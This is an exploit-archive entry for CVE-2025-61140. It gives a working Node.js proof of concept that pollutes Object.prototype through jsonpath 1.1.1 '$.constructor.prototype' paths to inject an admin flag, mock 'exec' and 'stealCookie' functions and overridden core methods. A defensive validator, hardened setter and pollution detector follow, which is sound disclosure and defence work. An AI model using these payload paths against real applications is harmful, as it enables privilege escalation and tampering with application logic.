| Title | Published | Views | Family |
|---|---|---|---|
| Security Bulletin: IBM App Connect Enterprise Certified Container operands are vulnerable to arbitrary code execution (CVE-2025-13465, CVE-2025-61140) and denial of service (CVE-2025-15284) | 3 Mar 2026 15:45 | – | ibm |
| Security Bulletin: IBM Sterling Secure Proxy is vulnerable to multiple issues | 26 Feb 2026 03:04 | – | ibm |
| CVE-2025-61140 | 28 Jan 2026 00:00 | – | attackerkb |
| CVE-2025-61140 | 30 Jan 2026 06:22 | – | circl |
| JSONPath security vulnerabilities | 28 Jan 2026 00:00 | – | cnnvd |
| CVE-2025-61140 | 28 Jan 2026 00:00 | – | cve |
| CVE-2025-61140 | 28 Jan 2026 00:00 | – | cvelist |
| EUVD-2025-206486 | 28 Jan 2026 00:00 | – | euvd |
| JSONPath vulnerable to Prototype Pollution due to insufficient input validation of object keys in lib/index.js | 28 Jan 2026 18:30 | – | github |
| CVE-2025-61140 | 28 Jan 2026 16:16 | – | nvd |
=============================================================================================================================================
# Title     : jsonpath 1.1.1 Prototype Pollution via constructor.prototype Assignment
# Author    : indoushka
# Tested on : Windows 11 Fr (Pro) / browser: Mozilla Firefox 147.0.3 (64-bit)
# Vendor    : https://www.redhat.com/
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/215071/ & CVE-2025-61140
[+] Summary : A prototype pollution vulnerability in jsonpath v1.1.1: unsafe writes to $.constructor.prototype allow an attacker to inject arbitrary properties and functions into Object.prototype.
By abusing jsonpath.value, an attacker can globally modify object behaviour, adding flags (e.g. admin), overriding core methods (toString, toJSON), and affecting arrays and strings through
the shared prototype chain. The PoC runs in Node.js and shows how an application that passes user-controlled JSONPath expressions to jsonpath.value can be compromised,
leading to privilege escalation and logic manipulation across the entire runtime.
Unvalidated writes to constructor.prototype enable global state corruption, which makes prototype pollution a high-impact risk even without direct code execution.
[+] POC :
```javascript
const jsonpath = require('jsonpath');

console.log("=== Prototype Pollution PoC By indoushka(jsonpath 1.1.1) ===\n");

// 1. Writing through $.constructor.prototype lands on Object.prototype,
//    so every later object literal inherits the injected properties.
console.log("1. Basic Test:");
console.log("Before:", ({}).polluted); // undefined
jsonpath.value({}, '$.constructor.prototype.polluted', "Yes, polluted");
jsonpath.value({}, '$.constructor.prototype.isHacked', true);
jsonpath.value({}, '$.constructor.prototype.hacker', "attacker");
console.log("After polluted:", ({}).polluted);
console.log("After isHacked:", ({}).isHacked);
console.log("After hacker:", ({}).hacker);

// 2. Functions can be injected the same way and become callable on any object.
console.log("\n2. Function Injection:");
jsonpath.value({}, '$.constructor.prototype.exec', function (cmd) {
  return `[MOCK EXEC] ${cmd}`;
});
jsonpath.value({}, '$.constructor.prototype.stealCookie', function () {
  return "Node.js environment – no cookies";
});
const o = {};
console.log(o.exec("whoami"));
console.log(o.stealCookie());

// 3. Core methods can be overridden, changing behaviour of JSON.stringify etc.
console.log("\n3. Behavior Modification:");
const originalToString = Object.prototype.toString;
const originalToJSON = Object.prototype.toJSON; // normally undefined
jsonpath.value({}, '$.constructor.prototype.toString', function () {
  return "[Object HACKED]";
});
jsonpath.value({}, '$.constructor.prototype.toJSON', function () {
  return { hacked: true };
});
const test = { a: 1 };
console.log("toString:", test.toString());
console.log("JSON:", JSON.stringify(test));

// 4. Arrays and primitives reach Object.prototype through their own prototypes.
console.log("\n4. Other Types:");
const arr = [1, 2, 3];
console.log("Array polluted:", arr.polluted);
const str = "hello";
console.log("String polluted:", str.polluted);

// 5. A wrapper that forwards a user-supplied path to jsonpath.value is enough.
console.log("\n5. Practical Scenario:");
function vulnerableApplication(path, value) {
  jsonpath.value({}, path, value);
}
console.log("Before admin:", ({}).admin);
vulnerableApplication(
  '$.constructor.prototype.admin',
  true
);
console.log("After admin:", ({}).admin);

// 6. Restore Object.prototype so the rest of the process behaves normally.
console.log("\n6. Cleanup:");
delete Object.prototype.polluted;
delete Object.prototype.isHacked;
delete Object.prototype.hacker;
delete Object.prototype.exec;
delete Object.prototype.stealCookie;
delete Object.prototype.admin;
Object.prototype.toString = originalToString;
if (originalToJSON === undefined) {
  delete Object.prototype.toJSON; // there was no toJSON before; do not leave an own property behind
} else {
  Object.prototype.toJSON = originalToJSON;
}
console.log("After cleanup polluted:", ({}).polluted);
console.log("After cleanup admin:", ({}).admin);
```
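The defensive counterpart to the PoC above, as an added example that is not part of the original advisory or of the jsonpath project: a validator that rejects JSONPath expressions able to reach the prototype chain (`constructor`, `prototype`, `__proto__`, recursive descent and filter expressions), a hardened setter that only ever descends into own properties, and a runtime integrity check that reports names added to Object.prototype after startup. The segment parser handles only the dot and bracket subset of JSONPath needed here, not the library's full grammar; the function names `segmentsOf`, `isSafeJsonPath`, `safeSetByPath` and `detectPrototypePollution` are this example's own, and the sample expressions are constructed.

```javascript
// Added example (not from the advisory or the jsonpath library): validate
// JSONPath expressions before handing them to jsonpath.value, and detect
// pollution of Object.prototype at runtime. No external packages required.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Split a JSONPath expression into member segments. Supports $.a.b, $['a']["b"],
// $[0], $[*] and $..a. Filter/script expressions ([?(...)], [(...)]) are
// rejected because their contents cannot be statically checked here.
function segmentsOf(expr) {
  if (typeof expr !== 'string' || !expr.startsWith('$')) {
    throw new TypeError('JSONPath expression must be a string starting with $');
  }
  const segs = [];
  let i = 1;
  while (i < expr.length) {
    const ch = expr[i];
    if (ch === '.') {
      i++;
      if (expr[i] === '.') { segs.push('..'); i++; } // recursive descent
      let j = i;
      while (j < expr.length && expr[j] !== '.' && expr[j] !== '[') j++;
      if (j > i) segs.push(expr.slice(i, j));
      i = j;
    } else if (ch === '[') {
      const close = expr.indexOf(']', i);
      if (close === -1) throw new SyntaxError('unterminated [ in ' + expr);
      let inner = expr.slice(i + 1, close).trim();
      if (inner.startsWith('?') || inner.startsWith('(')) {
        throw new SyntaxError('filter/script expressions are not allowed');
      }
      if ((inner.startsWith("'") && inner.endsWith("'")) ||
          (inner.startsWith('"') && inner.endsWith('"'))) {
        inner = inner.slice(1, -1); // strip one layer of quotes
      }
      segs.push(inner);
      i = close + 1;
    } else {
      throw new SyntaxError('unexpected character ' + JSON.stringify(ch) + ' in ' + expr);
    }
  }
  return segs;
}

// True only when every segment parses and none can reach the prototype chain.
function isSafeJsonPath(expr) {
  try {
    return segmentsOf(expr).every(s => !FORBIDDEN_KEYS.has(s));
  } catch (e) {
    return false; // unparsable or filter expressions are treated as unsafe
  }
}

// Hardened stand-in for jsonpath.value(obj, path, value): rejects unsafe paths
// and creates/descends only through own, plain-object properties.
function safeSetByPath(obj, expr, value) {
  const segs = segmentsOf(expr);
  if (segs.length === 0 || segs.some(s => FORBIDDEN_KEYS.has(s) || s === '..' || s === '*')) {
    throw new Error('refusing unsafe JSONPath expression: ' + expr);
  }
  let cur = obj;
  for (let k = 0; k < segs.length - 1; k++) {
    const key = segs[k];
    const own = Object.prototype.hasOwnProperty.call(cur, key);
    if (!own || typeof cur[key] !== 'object' || cur[key] === null) {
      cur[key] = {}; // never follow an inherited value down the chain
    }
    cur = cur[key];
  }
  cur[segs[segs.length - 1]] = value;
  return obj;
}

// Snapshot Object.prototype's own names at startup; any later addition is
// evidence that something in the process polluted the shared prototype.
const PROTOTYPE_BASELINE = new Set(Object.getOwnPropertyNames(Object.prototype));

function detectPrototypePollution() {
  return Object.getOwnPropertyNames(Object.prototype)
    .filter(name => !PROTOTYPE_BASELINE.has(name));
}

// Demo on constructed inputs: the advisory's path is rejected, normal paths pass.
const EXAMPLES = [
  '$.constructor.prototype.polluted',
  "$['__proto__']['admin']",
  '$..constructor',
  '$.user.profile.name',
];
for (const e of EXAMPLES) console.log(isSafeJsonPath(e) ? 'allow ' : 'reject', e);

const doc = safeSetByPath({}, "$.user['profile'].name", 'alice');
console.log(JSON.stringify(doc));                         // {"user":{"profile":{"name":"alice"}}}
console.log('pollution markers:', detectPrototypePollution()); // []
```

In an application, `isSafeJsonPath` would gate every user-supplied expression before it reaches `jsonpath.value`, and `detectPrototypePollution` can run from a health check or test harness to catch pollution introduced by any other code path. Upgrading to a fixed jsonpath release remains the primary fix; the validator is a defence-in-depth layer.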
Greetings to : jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)
====================================================================================